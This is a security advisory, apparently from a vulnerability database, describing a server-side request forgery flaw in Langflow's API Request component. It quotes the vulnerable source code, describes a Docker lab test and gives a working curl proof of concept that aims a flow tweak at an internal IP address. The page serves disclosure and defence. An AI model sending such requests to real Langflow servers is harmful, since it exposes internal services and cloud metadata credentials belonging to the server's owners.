Mondoo Vulnerability Intelligence
Search vulnerabilities and malicious packages across npm, PyPI, Go, GitHub Actions, VS Code, and more.
Search vulnerabilities and malicious packages across npm, PyPI, Go, GitHub Actions, VS Code, and more.
Vulnerability Overview
Langflow provides an API Request component that can issue arbitrary HTTP requests within a flow. This component takes a user-supplied URL, performs only normalization and basic format checks, and then sends the request using a server-side httpx client. It does not block private IP ranges (127.0.0.1, the 10/172/192 ranges) or cloud metadata endpoints (169.254.169.254), and it returns the response body as the result.
Because the flow execution endpoints (/api/v1/run, /api/v1/run/advanced) can be invoked with just an API key, if an attacker can control the API Request URL in a flow, non-blind SSRF is possible—accessing internal resources from the server’s network context. This enables requests to, and collection of responses from, internal administrative endpoints, metadata services, and internal databases/services, leading to information disclosure and providing a foothold for further attacks.
Vulnerable Code
When a flow runs, the API Request URL is set via user input or tweaks, or it falls back to the value stored in the node UI.
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L349-L359
@router.post("/run/{flow_id_or_name}", response_model=None, response_model_exclude_none=True)
async def simplified_run_flow(
*,
background_tasks: BackgroundTasks,
flow: Annotated[FlowRead | None, Depends(get_flow_by_id_or_endpoint_name)],
input_request: SimplifiedAPIRequest | None = None,
stream: bool = False,
api_key_user: Annotated[UserRead, Depends(api_key_security)],
context: dict | None = None,
http_request: Request,
):
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/backend/base/langflow/api/v1/endpoints.py#L573-L588
@router.post(
"/run/advanced/{flow_id_or_name}",
response_model=RunResponse,
response_model_exclude_none=True,
)
async def experimental_run_flow(
*,
session: DbSession,
flow: Annotated[Flow, Depends(get_flow_by_id_or_endpoint_name)],
inputs: list[InputValueRequest] | None = None,
outputs: list[str] | None = None,
tweaks: Annotated[Tweaks | None, Body(embed=True)] = None,
stream: Annotated[bool, Body(embed=True)] = False,
session_id: Annotated[None | str, Body(embed=True)] = None,
api_key_user: Annotated[UserRead, Depends(api_key_security)],
) -> RunResponse:
Normalization/validation stage: It only checks that the URL is non-empty and well-formed. No blocking of private networks, localhost, or IMDS.
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L280-L289
def _normalize_url(self, url: str) -> str:
"""Normalize URL by adding https:// if no protocol is specified."""
if not url or not isinstance(url, str):
msg = "URL cannot be empty"
raise ValueError(msg)
url = url.strip()
if url.startswith(("http://", "https://")):
return url
return f"https://{url}"
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L433-L438
url = self._normalize_url(url)
# Validate URL
if not validators.url(url):
msg = f"Invalid URL provided: {url}"
raise ValueError(msg)
On the server side, it sends a request to an arbitrary URL using httpx.AsyncClient and exposes the response body as metadata["result"].
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L312-L322
try:
# Prepare request parameters
request_params = {
"method": method,
"url": url,
"headers": headers,
"json": processed_body,
"timeout": timeout,
"follow_redirects": follow_redirects,
}
response = await client.request(**request_params)
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L335-L340
# Base metadata
metadata = {
"source": url,
"status_code": response.status_code,
"response_headers": response_headers,
}
https://github.com/langflow-ai/langflow/blob/fa21c4e5f11a697431ef471d63ff70d20c05c6dd/src/lfx/src/lfx/components/data/api_request.py#L364-L379
# Handle response content
if is_binary:
result = response.content
else:
try:
result = response.json()
except json.JSONDecodeError:
self.log("Failed to decode JSON response")
result = response.text.encode("utf-8")
metadata["result"] = result
if include_httpx_metadata:
metadata.update({"headers": headers})
return Data(data=metadata)
PoC Description
langflowai/langflow:latest Docker container, and a separate container internal-api that exposes an internal-only endpoint /internal on port 8000. Both containers were attached to the same user-defined network (ssrf-net), allowing communication by name or via the IP 172.18.0.3.http://172.18.0.3:8000/internal). Then I invoked /api/v1/run/advanced/<FLOW_ID> with an API key to perform SSRF. The response returned the internal service’s body in the result field, confirming non-blind SSRF.PoC
Langflow Setting
<img width="1917" height="940" alt="image" src="https://github.com/user-attachments/assets/96b0d770-b260-440f-9205-1583c108e12f" />Exploit
curl -s -X POST 'http://localhost:7860/api/v1/run/advanced/0b7f7713-d88c-4f92-bcf8-0dafe250ea9d' \
-H 'Content-Type: application/json' \
-H 'x-api-key: sk-HHc93OjH_4ep_EhfWrweP1IwpooJ3ZZnYOu-HgqJV4M' \
--data-raw '{
"inputs":[{"components":[],"input_value":""}],
"outputs":["Chat Output"],
"tweaks":{"API Request":{"url_input":"http://172.18.0.3:8000/internal","include_httpx_metadata":false}},
"stream":false
}' | jq -r '.outputs[0].outputs[0].results.message.text | sub("^```json\\n";"") | sub("\\n```$";"") | fromjson | .result'
<img width="1918" height="1029" alt="image" src="https://github.com/user-attachments/assets/4883029f-bd56-4c23-b5a3-6f8a84dbcce1" />
1.7.1Exploitability
AV:NAC:LPR:LUI:NScope
S:CImpact
C:HI:NA:NCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N